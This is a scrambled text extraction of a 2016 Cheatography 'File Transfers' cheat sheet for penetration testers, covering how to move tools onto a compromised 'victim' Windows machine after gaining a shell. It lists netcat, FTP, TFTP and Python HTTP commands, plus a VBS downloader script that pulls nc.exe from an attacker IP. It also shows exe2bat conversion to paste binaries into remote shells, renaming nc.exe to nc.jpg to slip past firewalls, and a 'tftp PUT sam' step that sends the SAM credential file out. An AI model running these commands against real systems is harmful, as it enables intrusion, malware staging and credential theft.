File Transfers Cheat Sheet by fred via cheatography.com/22666/cs/9067/
Info Netcat FTP Upload (cont) Internet Explorer
Check Transfer Progress nc -lvp 12345 | tar -xf Victim (Window s) Can be good for bypassing http:// www .cy ber cit i.bi z/ ope n-‐ - (on receiver) After getting a shell: Firewalls sour ce/ com man d-l ine -ha cks /pv - tar -cf - filenam e.txt | echo open 192.168 .34.10 mv nc.exe to nc.jpg (exe co mma nd- exa mples/ nc -vn 192.168 .1.14 > ftp.txt (commands to be files will open a dialog, so they 12345 (on sender) run in the -s step) need to be converted) DEBUG.exe Note: You will have no echo myftp>> ftp.txt (no ./abil ity -li nux (gain your Note: Uploaded file cannot be indication of file progress. just space between username and remote shell) larger than 64-bytes. UPX can wait a period of time then append command) cd prog* be used to compress files. CTRL+C echo myftp>> ftp.txt cd internet* locate exe2bat .exe http:// www .g- loa ded .eu /2‐ echo bin >> ftp.txt start iexplor e.exe wine exe2bat .exe 006/ 11/ 06/ net cat -a- cou ple -of -u‐ echo get nc.exe >> http:// 192 .16 8.8.17 3/‐ upx -9 nc.exe (to compress sefu l-e xam ples/ ftp.txt nc.jpg` (nc.jpg will be nc.exe) echo bye >> ftp.txt downloaded to temp ls -l nc.exe (should now be FTP - Windows ftp -s:ftp.txt (-s run directory) smaller) Connect to an ftp server on port commands in ftp.txt) Navigate to the wine exe2bat .exe /root/‐ 80 temporary internet files nc.exe nc.txt (convert ftp FTP - Pure-FTPD on the victim (e.g. nc.exe to nc.txt) open x.x.x.x 80 /etc/i nit .d/ pur e-ftpd c:\docu ments and settin‐ cat nc.txt | more (should Connect using commands in start (start ftp server) gs\ offs ec\ local settin‐ be a hex dump) config.txt netstat -antp (confirm gs\ temp orary internet Near the end of nc.txt, exe2bat ftp -n -v -s:config.txt server on port 21) files) tells the debugger on the 10.2.10 .14 /etc/i nit .d/ pur e-ftpd copy nc.jpg c:\ windows victim to create an exe config .txt: stop (stop ftp server) cd\ Gain your shell using your usual user uid1234 (username) ls -l /ftphome (home ftp rename nc.jpg nc.exe exploit then copy and paste the uid1234 (password) directory created by ftpd) nc.exe (nc should be contents of nc.txt into the remote quit cp nc.exe /ftphome (copy functio nal) shell. If it fails, re-run any failed netcat to ftphome) commands manually. nc.exe will FTP Upload ftp 127.0.0.1 (login ftp to down.vbs now be created on the victim Outbound FTP is usually server) machine. 'Barabas pure vbs downloader - allowed in companies. ls (netcat should appear) tested on XP sp2 Kali bin (switch to binary for file Python 'Microsoft fixed adodbst ream but pure-pw useradd hacker - transfer) guess what :) Victim u ftpusers -d /ftphome/ get nc.exe (confirm file '(c)dec 2004 python -m SimpleH TTP Se‐ (create user hacker) transfer works) 'First argument = complete url to rver pure-pw mkdb bye download Attac ker cp /pentes t/w ind ows /n‐ file nc.exe (confirm file 'Second Argument = filename Browse to victim from attacking c.exe /ftphome properties are intact) you want to save machine for a directory listing /etc/i nit .d/ pur e-ftpd 'thnks to http:// www .er icp he‐ start lps.com /sc rip tin g/s amp les /Bi na‐ ftp 127.0.0.1 (test login) ryDownload/ ' ls (nc.exe should appear) 'v2 - now includes proxy support bye for the winhttp request stuff
By fred Published 9th September, 2016. Sponsored by Readable.com cheatography.com/fred/ Last updated 9th September, 2016. Measure your website readability! Page 1 of 2. https://readable.com File Transfers Cheat Sheet by fred via cheatography.com/22666/cs/9067/
down.vbs (cont) VBS Download (with TFTP (cont) down.vbs) (cont) strUrl = WScript .Ar gum ent s.I‐ Download from Attacker tem(0) nc.exe (check if file is functi‐ Kali StrFile = WScript .Ar gum ent s.I‐ onal) atftpd --daemon --port tem(1) 69 /tmp 'WinHtt pRe quest proxy settings. TFTP Server /usr/s har e/w ind ows -b‐ Const HTTPREQ UES T_P RO‐ Kali inar ies /nc .exe /tmp XYSE TTING_ apt-get install atftpd chmod 777 /tmp/nc .exe DEFAULT = 0 atftpd --daemon --port Windo ws Const HTTPREQ UES T_P RO‐ 69 /tmp (start in daemon Initiate your remote shell to the XYSE TTI NG_ PRE CONFIG = 0 mode on port 69, home directory Windows PC using your exploit: Const HTTPREQ UES T_P RO‐ /tmp) ./ability-linux.py (ability XYSE TTI NG_ DIRECT = 1 atftpd --daemon --port exploit, served, shell started) 1234 /tmp (start in daemon `cd` VBS Download (with tftp -i 192.168 .23.10 mode on port 1234, home down.vbs) directory /tmp) GET nc.exe (on Windows cat down.vbs (confirm netstat -anup | grep Victim, IP = Kali) contents) atftp (should be listening on Upload to Attacker sed ’s/^echo /‘ downlo‐ tftp -i 192.168 .8.172 port 69 udp) ad-v bsc ript (add echo to cp /nc.exe /tmp PUT sam start of lines) Downl oading in Linux sam should now appear in /tmp sed ’s/^echo /‘ downlo‐ tftp 127.0.0.1 (connect to on the Kali machine ad-v bsc ript | sed ’s/S/ Download in Windows server) tftp get 2.3.5.1: /l an‐ >> down.vbs/‘ (add append get nc.exe scan (get the file lanscan from to end of lines) quit sed ’s/^echo /‘ downlo‐ TFTP server 2.3.5.1) ls -l nc.exe ad-v bsc ript | sed ’s/S/ file nc.exe >> down.vbs/‘ | grep -v Kill Server ‘echo >> down.dbs’ ps -ef | grep atftp (remove echo on blank lines) kill -9 16084 (first column /etc/i nit .d/ apa che2 number) start netstat -anup | grep 69 cp nc.exe /var/www/ (confirm server has been killed) After getting a shell on your
Victim: TFTP Copy and paste the text output Note: Most corporate firewalls of the final sed command above will block outbound traffic and hit enter to create down.vbs. rendering TFTP unusable. TFTP cscript down.vbs might not be on Windows http:// 192 .16 8.8.17 3/‐ machines. Files transfe rred will nc.exe nc2.exe (to run usually be read only. Change down.vbs, which will download attrib of file to delete using attrib nc.exe to nc2.exe) -r filename.
By fred Published 9th September, 2016. Sponsored by Readable.com cheatography.com/fred/ Last updated 9th September, 2016. Measure your website readability! Page 2 of 2. https://readable.com